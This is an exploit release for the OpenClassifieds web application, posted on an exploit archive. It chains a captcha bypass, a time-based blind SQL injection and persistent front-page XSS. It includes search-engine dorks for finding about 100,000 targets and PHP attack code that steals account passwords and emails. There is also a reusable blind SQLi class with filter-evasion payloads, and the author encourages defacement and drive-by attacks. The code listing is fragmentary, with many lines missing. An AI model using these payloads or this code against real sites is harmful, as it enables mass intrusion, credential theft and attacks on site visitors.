OpenClassifieds Chained: Captcha Bypass -> SQL Injection -> XSS on Frontpage

Type packetstorm
Reporter Michael Brooks
Modified 2010-12-27T00:00:00


                                            `Author:Michael Brooks (Rook)<br>  
Exploit chain:captcha bypass->sqli(insert)->persistant xss on front page<br>  
If registration is required an extra link in the chain is added:<br>  
Exploit chain:blind sqli(select)->captcha bypass->sqli(insert)->persistant xss on front page<br>  
sites with SEO url's enabled:<br>  
"powerd by Open Classifieds" inurl:"publish-a-new-ad.htm" (85,000 results)<br>  
or default urls:<br>  
"powerd by Open Classifieds" inurl:"item-new.php" (16,500 results)<br>  
Total sites: ~100,000<br>  
The target must be a link to the document root of OpenClassifieds<br>  
(If the exploit doesn't immediately reload then blind sqli is required, which will take a few minutes ;)<br>  
Target:  <input size=128 name=target value="http://localhost/"><br>  
Payload:<input size=128 name=xss value="<script>alert('xss')</script>"><br>  
<input type=submit value="Attack">  
I have always wanted to write a chained exploit with a captcha bypass, so I couldn't miss this  
opportunity. I spent a bit more effort on this exploit even though there aren't very many hits (around  
100k starts to be worth while). Regardless, I dug into the application and pulled out the vulnerabilities  
needed to Finnish my masterpiece. Usually when I write a Remote Code Execution exploit for a web  
app you guys just deface the site or throw up drive-by attacks. So I figured, persistent XSS on the  
front page is equally as valuable, especially with yet another IE 0-day in the wild. The chain is within  
the application its self. Process sand-boxing like chroot/AppArmor/SELinux/Application-V(MS)  
doesn't come into play. It works regardless of the operating system or configurations (Suhosin,  
safemode, magic_quotes_gpc and register_globals doesn't come into play). I focused on the  
application's internal configurations that could break the exploitation process. In this case seo friendly  
urls and requiring an account before posting.   
"This web application [OpenClassifieds] is developed to be fast, light, secure and SEO friendly."  
Usually when I see that an application claims to be secure, they really don't know what the fuck they  
are doing. OpenClassifieds' Security model is deeply flawed and as a result there are MANY  
vulnerabilities in this code base which allowed me to string a few cool ones together to make an  
interesting exploit. OpenClassifieds is sanitizing everything on input using cG() and cP(), these  
functions are used to perform a mysql_real_escape_string() on all GET and POST variables. Most  
servers aren't using an exotic character set so from a security stand point this is exactly identical to  
magic_quotes_gpc. So I dusted off my usual magic_quotes_gpc auditing tricks, look for  
stripslashes(),base64decode(),urldecode(),html_entity_decode() lack of quote marks around variables  
in a query, ect... Sanitation must ALWAYS be done at the time of use, parametrized queries are a  
good example of this. Its impossible to account for all the ways a variable can be mangled once it  
enters a program and if you Sanitize input when it first enters the program there will be cases where it  
will become dangerous again. This isn't only a problem for SQLi, its also a problem for XSS. I am  
inserting JS into the database, which isn't a vulnerablity, but printing it, is persistant XSS.   
The blind sql injection is a bit strange. I can't use white space or commas, which is a pain. I had to  
rewrite my general purpose Blind SQLi Class to accommodate. A binary search is used to greatly  
speed up the blind sqli attack.   
(which I also used in my php-nuke exploit:  
Special thanks to Reiners for this sqli filter evasion cheat sheet:  
Here are some changes I had to make to my blind sql injection class:  
"select substring('abc',1,1)"=>"select substring('abc' from 1 for 1)"  
if(greatest(".sprintf($question,$cur).",".$pos.")!=".$pos.",sleep(".$this->timeout."),0)" =>"case ".sprintf($question,"0+".$cur).">".$pos." when true then sleep(".$this->timeout.") end"  
CWE Violations leveraged by this exploit:   
CWE-256: Plaintext Storage of a Password  
CWE-804: Guessable CAPTCHA (I asked that they create this CWE when I ran into a guy that works for Mitre.)  
CWE-89: SQL Injection x2  
CWE-79: Cross-site Scripting (Persistant)  
Vulnerable captcha:  
openclassifieds/includes/common.php line 291  
function encode_str ($input){//converts the input into Ascii HTML, to ofuscate a bit  
for ($i = 0; $i < strlen($input); $i++) {  
$output .= "&#".ord($input[$i]).';';  
//$output = htmlspecialchars($output);//uncomment to escape sepecial chars  
return $output;  
function mathCaptcha(){//generates a captcha for the form  
$first_number=mt_rand(1, 94);//first operation number  
$second_number=mt_rand(1, 5);//second operation number  
$_SESSION["mathCaptcha"]=($first_number+$second_number);//operation result  
$operation=" <b>".encode_str($first_number ." + ". $second_number)."</b>?";//operation codifieds  
echo _("How much is")." ".$operation;  
Vulnerable persistant xss and sqli  
/content/item-new.php line 41  
$ocdb->insert(TABLE_PREFIX."posts (idCategory,type,title,description,price,idLocation,place,name,email,phone,password,ip,hasImages)","".  
function main(){  
if($_REQUEST['target'] && $_REQUEST['xss']){  
print("<b>Persistant XSS attack was sucessful.</b>");  
print("<b>Persistant XSS attack has failed.</b>");  
//w00t, I can crack your captcha with 4 lines of code!   
//It would have been 3 if i had used eval(), but that would be a vulnerability ;)  
function breakCaptcha($page){  
$math=new EvalMath();  
return $math->evaluate($code);  
function xssFrontPage($url,$xss){  
$h=new http_client();  
#Authentication required.  
if(strstr($page,'Location: http')){#Do we need authentication?   
print "Blind SQL Injection required.<br>";  
$sex=new openclassifieds_blind_sql_injection($url."/");  
print "Target is vulnerable to attack!<br>";  
print "Found Password:<b>$pass</b><br>";  
print "Found email:<b>$email</b><br>";  
die("This target is not exploitable!<br>");  
$pwd=mt_rand(1,9999999);//Strong password :p  
//Stored xss in the description,place and name columns.   
//I could use sql injection to find the id, but thats noisy and slow.   
//seo friendly  
}else if(preg_match("/item\=(.*)\&type/",$rss,$match)){  
#Now lets activate the XSS post.  
$test=strstr($page,"<script language='JavaScript' type='text/javascript'>alert('");  
return $test;  
//The blind_sql_injeciton calss is a general exploit framework that we are inheriting.  
class openclassifieds_blind_sql_injection extends blind_sql_injection {  
//This is the blind sql injection request.  
function query($check){  
//build the http request to Inject a query:  
//"%26%23039;" is a single quote encoded with urlencode(htmlencode("'",ENT_QUOTES));  
$payload="%26%23039; or (select ".$check." from oc_accounts where active=1 limit 1) or 1=%26%23039;";  
#white space becomes and underscore "_" so it must be replaced.   
$payload=str_replace(" ","/**/",$payload);  
//This is a very efficient blind sql injection class.  
class blind_sql_injection{  
var $url, $backup_url, $result, $http, $request_count, $timeout;  
function blind_sql_injection($url,$timeout=10){  
$this->http=new http_client();  
function set_get($get){  
function set_referer($referer){  
function set_post($post){  
function test_target(){  
return $this->send("case true when true then sleep(".$this->timeout.") when false then sleep(0) end")&&!$this->send("case false when true then sleep(".$this->timeout.") when false then sleep(0) end");  
#return $this->send("if(true,sleep(".$this->timeout."),0)")&&!$this->send("if(false,sleep(".$this->timeout."),0)");  
function num_to_hex($arr){  
foreach($arr as $a){  
return $ret;  
###These where not ported to the non-comma version.   
//Looking for a string of length 32 and base 16 in ascii chars.  
#function find_md5($column){  
# return $this->num_to_hex($this->bin_finder(16,32,"conv(substring($column,%s,1),16,10)"));  
#function find_sha1($column){  
# return $this->num_to_hex($this->bin_finder(16,40,"conv(substring($column,%s,1),16,10)"));  
//Look for an ascii string of arbitrary length.  
function find_string($column){  
//A length of zero means we are looking for a null byte terminated string.  
$result=$this->bin_finder(128,0,"ascii(substring($column from %s for 1))");  
foreach($result as $r){  
return strrev($ret);  
//query() is a method that generates the sql injection request  
function query($check){  
//This function must be overridden.  
function recheck($result,$question,$base){  
//Force a long timeout.  
foreach($result as $r){  
function linear_finder($base,$length,$question){  
#Binary search for mysql based sql injection.  
function bin_finder($base,$length,$question){  
$pos= $low+(($high-$low)/2);  
#asking the sql database if the current value is greater than $pos  
if($this->send("case ".sprintf($question,"0+".$cur).">".$pos." when true then sleep(".$this->timeout.") end")){  
#if this is true then the value must be the modulus.  
#asking the sql database if the current value is less than $pos  
}else if($this->send("case ".sprintf($question,"0+".$cur)."<".$pos." when true then sleep(".$this->timeout.") end")){  
#}else if($this->send("if(least(".sprintf($question,$cur).",".$pos.")!=".$pos.",sleep(".$this->timeout."),0)")){  
#if this is true the value must be zero, or in the case of ascii, a null byte.  
#We have found the null terminator so we have finnished our search for a string.  
#both greater than and less then where asked, so so then the answer is our guess $pos.  
return $result;  
//Fire off the request  
function send($quesiton){  
//build the injected query.  
//backup_url is for set_get()  
return (time()-$start>=$this->timeout);  
//retroGod RIP  
function charEncode($string){  
return $char;  
//General purpose http client that works on a default php install. (curl not required)  
class http_client{  
var $proxy_ip='', $proxy_port='', $proxy_name='', $proxy_pass='', $referer='',$cookie='',$postdata='';  
function send($loc){  
//overload function polymorphism between gets and posts  
$fp = pfsockopen( $this->proxy_ip, $this->proxy_port, &$errno, &$errstr, 120 );  
$fp = fsockopen( $url['host'], $url['port'], &$errno, &$errstr, 120 );  
if( !$fp ) {  
print "$errstr ($errno)<br>\nn";  
return false;  
} else {  
if( $this->postdata=='' ) {  
$request="GET ".$url['path']."?".$url['query']." HTTP/1.1\r\n";  
} else {  
$request="POST ".$url['path']."?".$url['query']." HTTP/1.1\r\n";  
$request.="Proxy-Authorization: Basic ".base64_encode($this->proxy_name.":".$this->proxy_pass)."\r\n\r\n";  
$request.="Host: ".$url['host'].":".$url['port']."\r\n";  
$request.="User-Agent: ".$ua."\r\n";  
$request.="Accept: text/plain\r\n";  
$request.="Referer: ".$this->referer."\r\n";  
$request.="Connection: Close\r\n";  
$request.="Cookie: ".$this->cookie."\r\n" ;  
if( $this->postdata!='' ) {  
$strlength = strlen( $this->postdata );  
$request.="Content-type: application/x-www-form-urlencoded\r\n" ;  
$request.="Content-length: ".$strlength."\r\n\r\n";  
fputs( $fp, $request."\r\n\r\n" );  
while( !feof( $fp ) ) {  
$output .= fgets( $fp, 1024 );  
fclose( $fp );  
if(strstr($header[0],"Set-Cookie: ") && $this->cookie==''){  
$cookie=explode("Set-Cookie: ",$header[0]);  
return $output;  
//Use a http proxy  
function proxy($proxy){ //user:pass@ip:port  
//Parses the results from a PHP error to use as a path disclosure.  
function getPath($url,$pops=1){  
//Regular error reporting:  
$resp=explode("array given in <b>",$html);  
$resp = explode("</b>",$resp[1]);  
//xdebug's error reporting:  
$resp=explode("array given in ",$html);  
$resp = explode(" ",$resp[1]);  
//Can't use dirname()  
return $path;  
//Grab the server type from the http header.  
function getServer($url){  
$header=explode("Server: ",$resp);  
return $server[0];  
#used to evaluate the captcha. 1+2=3  
class EvalMath {  
var $suppress_errors = false;  
var $last_error = null;  
var $v = array('e'=>2.71,'pi'=>3.14); // variables (and constants)  
var $f = array(); // user-defined functions  
var $vb = array('e', 'pi'); // constants  
var $fb = array( // built-in functions  
function EvalMath() {  
// make the variables a little more accurate  
$this->v['pi'] = pi();  
$this->v['e'] = exp(1);  
function e($expr) {  
return $this->evaluate($expr);  
function evaluate($expr) {  
$this->last_error = null;  
$expr = trim($expr);  
if (substr($expr, -1, 1) == ';') $expr = substr($expr, 0, strlen($expr)-1); // strip semicolons at the end  
// is it a variable assignment?  
if (preg_match('/^\s*([a-z]\w*)\s*=\s*(.+)$/', $expr, $matches)) {  
if (in_array($matches[1], $this->vb)) { // make sure we're not assigning to a constant  
return $this->trigger("cannot assign to constant '$matches[1]'");  
if (($tmp = $this->pfx($this->nfx($matches[2]))) === false) return false; // get the result and make sure it's good  
$this->v[$matches[1]] = $tmp; // if so, stick it in the variable array  
return $this->v[$matches[1]]; // and return the resulting value  
// is it a function assignment?  
} elseif (preg_match('/^\s*([a-z]\w*)\s*\(\s*([a-z]\w*(?:\s*,\s*[a-z]\w*)*)\s*\)\s*=\s*(.+)$/', $expr, $matches)) {  
$fnn = $matches[1]; // get the function name  
if (in_array($matches[1], $this->fb)) { // make sure it isn't built in  
return $this->trigger("cannot redefine built-in function '$matches[1]()'");  
$args = explode(",", preg_replace("/\s+/", "", $matches[2])); // get the arguments  
if (($stack = $this->nfx($matches[3])) === false) return false; // see if it can be converted to postfix  
for ($i = 0; $i<count($stack); $i++) { // freeze the state of the non-argument variables  
$token = $stack[$i];  
if (preg_match('/^[a-z]\w*$/', $token) and !in_array($token, $args)) {  
if (array_key_exists($token, $this->v)) {  
$stack[$i] = $this->v[$token];  
} else {  
return $this->trigger("undefined variable '$token' in function definition");  
$this->f[$fnn] = array('args'=>$args, 'func'=>$stack);  
return true;  
} else {  
return $this->pfx($this->nfx($expr)); // straight up evaluation, woo  
function vars() {  
$output = $this->v;  
return $output;  
function funcs() {  
$output = array();  
foreach ($this->f as $fnn=>$dat)  
$output[] = $fnn . '(' . implode(',', $dat['args']) . ')';  
return $output;  
//===================== HERE BE INTERNAL METHODS ====================\\  
// Convert infix to postfix notation  
function nfx($expr) {  
$index = 0;  
$stack = new EvalMathStack;  
$output = array(); // postfix form of expression, to be passed to pfx()  
$expr = trim(strtolower($expr));  
$ops = array('+', '-', '*', '/', '^', '_');  
$ops_r = array('+'=>0,'-'=>0,'*'=>0,'/'=>0,'^'=>1); // right-associative operator?   
$ops_p = array('+'=>0,'-'=>0,'*'=>1,'/'=>1,'_'=>1,'^'=>2); // operator precedence  
$expecting_op = false; // we use this in syntax-checking the expression  
// and determining when a - is a negation  
if (preg_match("/[^\w\s+*^\/()\.,-]/", $expr, $matches)) { // make sure the characters are all good  
return $this->trigger("illegal character '{$matches[0]}'");  
while(1) { // 1 Infinite Loop ;)  
$op = substr($expr, $index, 1); // get the first character at the current index  
// find out if we're currently at the beginning of a number/variable/function/parenthesis/operand  
$ex = preg_match('/^([a-z]\w*\(?|\d+(?:\.\d*)?|\.\d+|\()/', substr($expr, $index), $match);  
if ($op == '-' and !$expecting_op) { // is it a negation instead of a minus?  
$stack->push('_'); // put a negation on the stack  
} elseif ($op == '_') { // we have to explicitly deny this, because it's legal on the stack   
return $this->trigger("illegal character '_'"); // but not in the input expression  
} elseif ((in_array($op, $ops) or $ex) and $expecting_op) { // are we putting an operator on the stack?  
if ($ex) { // are we expecting an operator but have a number/variable/function/opening parethesis?  
$op = '*'; $index--; // it's an implicit multiplication  
// heart of the algorithm:  
while($stack->count > 0 and ($o2 = $stack->last()) and in_array($o2, $ops) and ($ops_r[$op] ? $ops_p[$op] < $ops_p[$o2] : $ops_p[$op] <= $ops_p[$o2])) {  
$output[] = $stack->pop(); // pop stuff off the stack into the output  
// many thanks:  
$stack->push($op); // finally put OUR operator onto the stack  
$expecting_op = false;  
} elseif ($op == ')' and $expecting_op) { // ready to close a parenthesis?  
while (($o2 = $stack->pop()) != '(') { // pop off the stack back to the last (  
if (is_null($o2)) return $this->trigger("unexpected ')'");  
else $output[] = $o2;  
if (preg_match("/^([a-z]\w*)\($/", $stack->last(2), $matches)) { // did we just close a function?  
$fnn = $matches[1]; // get the function name  
$arg_count = $stack->pop(); // see how many arguments there were (cleverly stored on the stack, thank you)  
$output[] = $stack->pop(); // pop the function and push onto the output  
if (in_array($fnn, $this->fb)) { // check the argument count  
if($arg_count > 1)  
return $this->trigger("too many arguments ($arg_count given, 1 expected)");  
} elseif (array_key_exists($fnn, $this->f)) {  
if ($arg_count != count($this->f[$fnn]['args']))  
return $this->trigger("wrong number of arguments ($arg_count given, " . count($this->f[$fnn]['args']) . " expected)");  
} else { // did we somehow push a non-function on the stack? this should never happen  
return $this->trigger("internal error");  
} elseif ($op == ',' and $expecting_op) { // did we just finish a function argument?  
while (($o2 = $stack->pop()) != '(') {   
if (is_null($o2)) return $this->trigger("unexpected ','"); // oops, never had a (  
else $output[] = $o2; // pop the argument expression stuff and push onto the output  
// make sure there was a function  
if (!preg_match("/^([a-z]\w*)\($/", $stack->last(2), $matches))  
return $this->trigger("unexpected ','");  
$stack->push($stack->pop()+1); // increment the argument count  
$stack->push('('); // put the ( back on, we'll need to pop back to it again  
$expecting_op = false;  
} elseif ($op == '(' and !$expecting_op) {  
$stack->push('('); // that was easy  
$allow_neg = true;  
} elseif ($ex and !$expecting_op) { // do we now have a function/variable/number?  
$expecting_op = true;  
$val = $match[1];  
if (preg_match("/^([a-z]\w*)\($/", $val, $matches)) { // may be func, or variable w/ implicit multiplication against parentheses...  
if (in_array($matches[1], $this->fb) or array_key_exists($matches[1], $this->f)) { // it's a func  
$expecting_op = false;  
} else { // it's a var w/ implicit multiplication  
$val = $matches[1];  
$output[] = $val;  
} else { // it's a plain old var or num  
$output[] = $val;  
$index += strlen($val);  
} elseif ($op == ')') { // miscellaneous error checking  
return $this->trigger("unexpected ')'");  
} elseif (in_array($op, $ops) and !$expecting_op) {  
return $this->trigger("unexpected operator '$op'");  
} else { // I don't even want to know what you did to get here  
return $this->trigger("an unexpected error occured");  
if ($index == strlen($expr)) {  
if (in_array($op, $ops)) { // did we end with an operator? bad.  
return $this->trigger("operator '$op' lacks operand");  
} else {  
while (substr($expr, $index, 1) == ' ') { // step the index past whitespace (pretty much turns whitespace   
$index++; // into implicit multiplication if no operator is there)  
while (!is_null($op = $stack->pop())) { // pop everything off the stack and push onto output  
if ($op == '(') return $this->trigger("expecting ')'"); // if there are (s on the stack, ()s were unbalanced  
$output[] = $op;  
return $output;  
// evaluate postfix notation  
function pfx($tokens, $vars = array()) {  
if ($tokens == false) return false;  
$stack = new EvalMathStack;  
foreach ($tokens as $token) { // nice and easy  
// if the token is a binary operator, pop two values off the stack, do the operation, and push the result back on  
if (in_array($token, array('+', '-', '*', '/', '^'))) {  
if (is_null($op2 = $stack->pop())) return $this->trigger("internal error");  
if (is_null($op1 = $stack->pop())) return $this->trigger("internal error");  
switch ($token) {  
case '+':  
$stack->push($op1+$op2); break;  
case '-':  
$stack->push($op1-$op2); break;  
case '*':  
$stack->push($op1*$op2); break;  
case '/':  
if ($op2 == 0) return $this->trigger("division by zero");  
$stack->push($op1/$op2); break;  
case '^':  
$stack->push(pow($op1, $op2)); break;  
// if the token is a unary operator, pop one value off the stack, do the operation, and push it back on  
} elseif ($token == "_") {  
// if the token is a function, pop arguments off the stack, hand them to the function, and push the result back on  
} elseif (preg_match("/^([a-z]\w*)\($/", $token, $matches)) { // it's a function!  
$fnn = $matches[1];  
if (in_array($fnn, $this->fb)) { // built-in function:  
if (is_null($op1 = $stack->pop())) return $this->trigger("internal error");  
$fnn = preg_replace("/^arc/", "a", $fnn); // for the 'arc' trig synonyms  
if ($fnn == 'ln') $fnn = 'log';  
eval('$stack->push(' . $fnn . '($op1));'); // perfectly safe eval()  
} elseif (array_key_exists($fnn, $this->f)) { // user function  
// get args  
$args = array();  
for ($i = count($this->f[$fnn]['args'])-1; $i >= 0; $i--) {  
if (is_null($args[$this->f[$fnn]['args'][$i]] = $stack->pop())) return $this->trigger("internal error");  
$stack->push($this->pfx($this->f[$fnn]['func'], $args)); // yay... recursion!!!!  
// if the token is a number or variable, push it on the stack  
} else {  
if (is_numeric($token)) {  
} elseif (array_key_exists($token, $this->v)) {  
} elseif (array_key_exists($token, $vars)) {  
} else {  
return $this->trigger("undefined variable '$token'");  
// when we're out of tokens, the stack should have a single element, the final result  
if ($stack->count != 1) return $this->trigger("internal error");  
return $stack->pop();  
// trigger an error, but nicely, if need be  
function trigger($msg) {  
$this->last_error = $msg;  
if (!$this->suppress_errors) trigger_error($msg, E_USER_WARNING);  
return false;  
// for internal use  
class EvalMathStack {  
var $stack = array();  
var $count = 0;  
function push($val) {  
$this->stack[$this->count] = $val;  
function pop() {  
if ($this->count > 0) {  
return $this->stack[$this->count];  
return null;  
function last($n=1) {  
return $this->stack[$this->count-$n];